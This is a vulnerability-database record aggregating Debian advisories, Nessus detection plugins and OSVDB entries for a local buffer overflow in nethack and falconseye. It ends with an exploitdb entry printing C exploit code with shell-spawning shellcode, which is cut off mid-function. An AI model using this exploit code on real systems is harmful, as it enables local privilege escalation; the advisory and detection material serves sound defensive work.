1f5a837d76b64bf52cfe0033924fb37e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye-data_1.9.3-7woody3_all.deb\n Size/MD5 checksum: 4991316 520ff0f0be13cfa42baa65af97f0b55e\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_alpha.deb\n Size/MD5 checksum: 1149664 3ff9e27ffa544fd1e5e2e8ddde03e1d5\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_arm.deb\n Size/MD5 checksum: 873900 1d50f9f972b15030de3923f9376a870b\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_i386.deb\n Size/MD5 checksum: 774438 f9df67fd1d58100b46aaf348d9678472\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_ia64.deb\n Size/MD5 checksum: 1381860 1a7d26c1962f3e222bd162b1d1f48359\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_hppa.deb\n Size/MD5 checksum: 1000060 7a106848005c7d98a4f85112dcfe4962\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_m68k.deb\n Size/MD5 checksum: 728580 dfe5e7296df28eebd191debcb081097c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_mips.deb\n Size/MD5 checksum: 935716 15224a235dc364839e9bd41dd86f21f5\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_mipsel.deb\n Size/MD5 checksum: 936784 c9b192045d43213a567a88eca6775dab\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_powerpc.deb\n Size/MD5 checksum: 881438 6e383fb41473e7433db1c88a05916c94\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_s390.deb\n Size/MD5 checksum: 854812 aa044dc021a572309b65c7d7ce821dca\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/f/falconseye/falconseye_1.9.3-7woody3_sparc.deb\n Size/MD5 checksum: 894254 0aaa7b6c9f8918aab550ea5e4af07a49\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2003-07-15T00:00:00", "published": "2003-07-15T00:00:00", "id": "DEBIAN:DSA-350-1:7D62B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00147.html", "title": "[SECURITY] [DSA-350-1] New falconseye packages fix buffer overflow", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:16:48", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 316-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJune 11th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : nethack\nVulnerability : buffer overflow, incorrect permissions\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0358 CAN-2003-0359\n\nThe nethack package is vulnerable to a buffer overflow exploited via a\nlong '-s' command line option. This vulnerability could be used by an\nattacker to gain gid 'games' on a system where nethack is installed.\n\nAdditionally, some setgid binaries in the nethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run nethack.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 3.4.0-3.0woody3.\n\nFor the old stable distribution (potato) problem xxx has been fixed in\nversion 3.3.0-7potato1.\n\nFor the unstable distribution (sid) these problems are fixed in\nversion 3.4.1-1.\n\nWe recommend that you update your nethack package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0-7potato1.dsc\n Size/MD5 checksum: 655 6457b20023bb6993cf7b67eb3d6a1f92\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0-7potato1.diff.gz\n Size/MD5 checksum: 18692 13ac890591e25dab8ceed16f72e1f471\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0.orig.tar.gz\n Size/MD5 checksum: 2887417 cf9f4039408321f39c3ef733455cb73a\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0-7potato1_alpha.deb\n Size/MD5 checksum: 1398066 713fcbb55b30327e41e27d6bcb6d607b\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0-7potato1_arm.deb\n Size/MD5 checksum: 1117428 73c2db664578473ef6659cab5cc4d6ef\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0-7potato1_i386.deb\n Size/MD5 checksum: 1022056 db40676e291e8df8a4e361bcbfffe7bf\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0-7potato1_m68k.deb\n Size/MD5 checksum: 978610 2b11d697920115da6d6221ff0a561c28\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0-7potato1_powerpc.deb\n Size/MD5 checksum: 1128166 97049fd8d1f264630e8388646f5b35e0\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.3.0-7potato1_sparc.deb\n Size/MD5 checksum: 1148254 a4ca25a566409ce3ff5bb84dc68b7b15\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.4.0-3.0woody3.dsc\n Size/MD5 checksum: 748 3b19c11e859addf7387327edc9919dda\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.4.0-3.0woody3.diff.gz\n Size/MD5 checksum: 67431 178cb16dc35eba59d3f2cb8d9bcc82c9\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.4.0.orig.tar.gz\n Size/MD5 checksum: 3270905 0093f14fbbe449d5b188bfb6aa4eae4f\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack_3.4.0-3.0woody3_all.deb\n Size/MD5 checksum: 12996 adc0f1e825fbaf6d051ebe9ce6d113fd\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_alpha.deb\n Size/MD5 checksum: 448546 e22a529c9f6dd56f754e65c143e888bf\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_alpha.deb\n Size/MD5 checksum: 1159370 7cb61bf9e18ab76ea49e8f5d07789b86\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_alpha.deb\n Size/MD5 checksum: 1166088 9a04f218f4f12986991f231f32d78657\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_alpha.deb\n Size/MD5 checksum: 1099536 4ade2cb58891fbf4612861e621de668a\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_arm.deb\n Size/MD5 checksum: 430974 73bb44aa965b99c8dc95dab7789aba7b\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_arm.deb\n Size/MD5 checksum: 891296 68a140761542ca2047adfd77ccee72c9\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_arm.deb\n Size/MD5 checksum: 908178 b5c7b5764ff27dffa7228848cacbf7c6\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_arm.deb\n Size/MD5 checksum: 826270 9090d14c531d1d6cd5ec555742aa39dc\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_i386.deb\n Size/MD5 checksum: 427996 cbd2cccef376e1986d3d30489ef41f46\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_i386.deb\n Size/MD5 checksum: 790660 6fc1683852e67991d7b8326313d3dada\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_i386.deb\n Size/MD5 checksum: 812066 bd0720e9b7ff4394388557628a782552\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_i386.deb\n Size/MD5 checksum: 722422 3e25c8e6abe0da37c38b18819ba41231\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_hppa.deb\n Size/MD5 checksum: 437252 4814c05bfe6becaa61d765c5e16d960b\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_hppa.deb\n Size/MD5 checksum: 1028208 f3786ca02d6e4a2addc838713c72b541\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_hppa.deb\n Size/MD5 checksum: 1050072 a7e2a4df3d68b695a8f115a07d02745c\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_hppa.deb\n Size/MD5 checksum: 964926 c52414ef50a612a375c50f62f32a9910\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_m68k.deb\n Size/MD5 checksum: 425090 d6f27579b87dc04bbdf3027e03d31c21\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_m68k.deb\n Size/MD5 checksum: 744130 6c9d59e42180972c686e9588c34a0dc3\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_m68k.deb\n Size/MD5 checksum: 759848 25f8e9bf0bfc3bb214cf44aa53551bb7\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_m68k.deb\n Size/MD5 checksum: 677096 1a8fee87a24e387b4cccc82047f56154\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_mips.deb\n Size/MD5 checksum: 437234 285bc9f5ecf31dc795b36d6d3938c198\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_mips.deb\n Size/MD5 checksum: 913234 8307a4a58da664337ffea071f9cfedb3\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_mips.deb\n Size/MD5 checksum: 962694 1f2157ea26bb522e53acadc8474c4b3b\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_mips.deb\n Size/MD5 checksum: 884232 d10f2486bdd53389c34be664fbbebf62\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_mipsel.deb\n Size/MD5 checksum: 436524 df00a3c0227ddeeb6784b40098be977e\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_mipsel.deb\n Size/MD5 checksum: 915438 1d4751a80d3a3b7c1856d3c11e3c42be\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_mipsel.deb\n Size/MD5 checksum: 960486 6eca0d12e7dcb0c2b048074897ce0633\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_mipsel.deb\n Size/MD5 checksum: 885692 ab561bd3c0d59511cd64bb562504d32a\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_powerpc.deb\n Size/MD5 checksum: 433282 44392c68c6c4642d13a8477e43888edc\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_powerpc.deb\n Size/MD5 checksum: 894054 8caa102c4fc9eaebe14b07573c64e8d6\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_powerpc.deb\n Size/MD5 checksum: 895404 a23e819c3810747f7133e7716a4c67f1\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_powerpc.deb\n Size/MD5 checksum: 829348 9ac4bfbec280ba184f53ea25a985423d\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_s390.deb\n Size/MD5 checksum: 431388 184539e76b551bf4fc906f1b79a582cf\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_s390.deb\n Size/MD5 checksum: 872456 9e731f496af24534688fae59e7f24045\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_s390.deb\n Size/MD5 checksum: 876436 7de38b1345a4a25a875ee8126a4f4200\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_s390.deb\n Size/MD5 checksum: 807628 d2388393e737ac21317a3e559566ec0d\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/n/nethack/nethack-common_3.4.0-3.0woody3_sparc.deb\n Size/MD5 checksum: 440772 ef35b8dc5cc1abbb0276d724656f68c8\n http://security.debian.org/pool/updates/main/n/nethack/nethack-gnome_3.4.0-3.0woody3_sparc.deb\n Size/MD5 checksum: 911986 0b2eee94e97f64b49f2cd3ff072dc2fa\n http://security.debian.org/pool/updates/main/n/nethack/nethack-qt_3.4.0-3.0woody3_sparc.deb\n Size/MD5 checksum: 912976 b690faf77cd6a932200779ca36763c95\n http://security.debian.org/pool/updates/main/n/nethack/nethack-x11_3.4.0-3.0woody3_sparc.deb\n Size/MD5 checksum: 847972 3668f6f14f7924b1446fad9591bd1abb\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2003-06-11T00:00:00", "published": "2003-06-11T00:00:00", "id": "DEBIAN:DSA-316-1:48A9A", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00107.html", "title": "[SECURITY] [DSA-316-1] New nethack packages fix buffer overflow, incorrect permissions", "type": "debian", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T09:49:25", "description": "The falconseye package is vulnerable to a buffer overflow exploited\nvia a long -s command line option. This vulnerability could be used by\nan attacker to gain gid 'games' on a system where falconseye is\ninstalled.\n\nNote that falconseye does not contain the file permission error\nCAN-2003-0359 which affected some other nethack packages.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-350-1 : falconseye - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:falconseye"], "id": "DEBIAN_DSA-350.NASL", "href": "https://www.tenable.com/plugins/nessus/15187", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-350. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15187);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0358\");\n script_bugtraq_id(6806);\n script_xref(name:\"DSA\", value:\"350\");\n\n script_name(english:\"Debian DSA-350-1 : falconseye - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The falconseye package is vulnerable to a buffer overflow exploited\nvia a long -s command line option. This vulnerability could be used by\nan attacker to gain gid 'games' on a system where falconseye is\ninstalled.\n\nNote that falconseye does not contain the file permission error\nCAN-2003-0359 which affected some other nethack packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-350\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the stable distribution (woody) this problem has been fixed in\nversion 1.9.3-7woody3.\n\nWe recommend that you update your falconseye package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:falconseye\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"falconseye\", reference:\"1.9.3-7woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"falconseye-data\", reference:\"1.9.3-7woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:48:54", "description": "The nethack and slashem packages are vulnerable to a buffer overflow\nexploited via a long '-s' command line option. This vulnerability\ncould be used by an attacker to gain gid 'games' on a system where\nnethack is installed.\n\nAdditionally, some setgid binaries in the nethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run nethack.\n\nNote that slashem does not contain the file permission problem\nCAN-2003-0359.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-316-1 : nethack - buffer overflow, incorrect permissions", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0359", "CVE-2003-0358"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:nethack", "cpe:/o:debian:debian_linux:2.2", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-316.NASL", "href": "https://www.tenable.com/plugins/nessus/15153", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-316. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15153);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0358\", \"CVE-2003-0359\");\n script_bugtraq_id(6806, 7953);\n script_xref(name:\"DSA\", value:\"316\");\n\n script_name(english:\"Debian DSA-316-1 : nethack - buffer overflow, incorrect permissions\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The nethack and slashem packages are vulnerable to a buffer overflow\nexploited via a long '-s' command line option. This vulnerability\ncould be used by an attacker to gain gid 'games' on a system where\nnethack is installed.\n\nAdditionally, some setgid binaries in the nethack package have\nincorrect permissions, which could allow a user who gains gid 'games'\nto replace these binaries, potentially causing other users to execute\nmalicious code when they run nethack.\n\nNote that slashem does not contain the file permission problem\nCAN-2003-0359.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-316\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the stable distribution (woody) these problems have been fixed in\nversion 3.4.0-3.0woody3.\n\nFor the old stable distribution (potato) these problems have been\nfixed in version 3.3.0-7potato1.\n\nWe recommend that you update your nethack package.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 0.0.6E4F8-4.0woody3.\n\nFor the old stable distribution (potato) these problems have been\nfixed in version 0.0.5E7-3potato1.\n\nWe recommend that you update your slashem package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nethack\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"nethack\", reference:\"3.3.0-7potato1\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack\", reference:\"3.4.0-3.0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack-common\", reference:\"3.4.0-3.0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack-gnome\", reference:\"3.4.0-3.0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack-qt\", reference:\"3.4.0-3.0woody3\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"nethack-x11\", reference:\"3.4.0-3.0woody3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0359"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-316)\nISS X-Force ID: 12362\n[CVE-2003-0359](https://vulners.com/cve/CVE-2003-0359)\nBugtraq ID: 7953\n", "modified": "2003-06-11T00:00:00", "published": "2003-06-11T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12021", "id": "OSVDB:12021", "type": "osvdb", "title": "nethack SGID Binary Installation Permission Weakness", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0358"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.nethack.org/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-316)\n[Related OSVDB ID: 12020](https://vulners.com/osvdb/OSVDB:12020)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-02/0117.html\nISS X-Force ID: 11283\n[CVE-2003-0358](https://vulners.com/cve/CVE-2003-0358)\nBugtraq ID: 6806\n", "modified": "2003-02-09T00:00:00", "published": "2003-02-09T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12019", "id": "OSVDB:12019", "type": "osvdb", "title": "nethack -s Option Local Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2003-0358"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://falconseye.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-350)\n[Related OSVDB ID: 12019](https://vulners.com/osvdb/OSVDB:12019)\nISS X-Force ID: 12618\n[CVE-2003-0358](https://vulners.com/cve/CVE-2003-0358)\n", "modified": "2003-07-15T00:00:00", "published": "2003-07-15T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12020", "id": "OSVDB:12020", "type": "osvdb", "title": "Falcon's Eye falconseye -s Option Local Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T18:16:47", "description": "Nethack 3 Local Buffer Overflow Vulnerability (1). CVE-2003-0358. Local exploit for linux platform", "published": "2003-02-10T00:00:00", "type": "exploitdb", "title": "Nethack 3 - Local Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0358"], "modified": "2003-02-10T00:00:00", "id": "EDB-ID:22233", "href": "https://www.exploit-db.com/exploits/22233/", "sourceData": "source: http://www.securityfocus.com/bid/6806/info\r\n\r\nBy passing an overly large string when invoking nethack, it is possible to corrupt memory.\r\n\r\nBy exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.\r\n\r\nslashem, jnethack and falconseye are also prone to this vulnerability.\r\n\r\n/*\r\n tsao@efnet #!IC@efnet 2k3\r\n thnx to aleph1 for execve shellcode &\r\n davidicke for setreuid() shellcode\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n\r\n\r\nchar code[] =\r\n\r\n\"\\x29\\xc4\\x31\\xc0\\x31\\xc9\\x31\\xdb\\xb3\\x0c\\x89\\xd9\\xb0\\x46\\xcd\\x80\"\r\n\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n\"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";\r\n\r\n\r\n\r\nunsigned long sp(void) {\r\n __asm__(\"movl %esp,%eax\");\r\n}\r\n\r\nint main(int argc, char **argv) {\r\n char *p;\r\n int i, off;\r\n\r\n p = malloc(sizeof(char) * atoi(argv[1]));\r\n memset(p,0x90,atoi(argv[1]));\r\n\r\n off = 220 - strlen(code);\r\n printf(\"shellcode at %d->%d\\n\",off,off+strlen(code));\r\n for(i=0;i<atoi(argv[1]);i++)\r\n p[i+off] = code[i];\r\n\r\n\r\n *(long *) &p[220] = sp() - atoi(argv[2]);\r\n printf(\"Using %x\\n\",sp() - atoi(argv[2]));\r\n\r\n 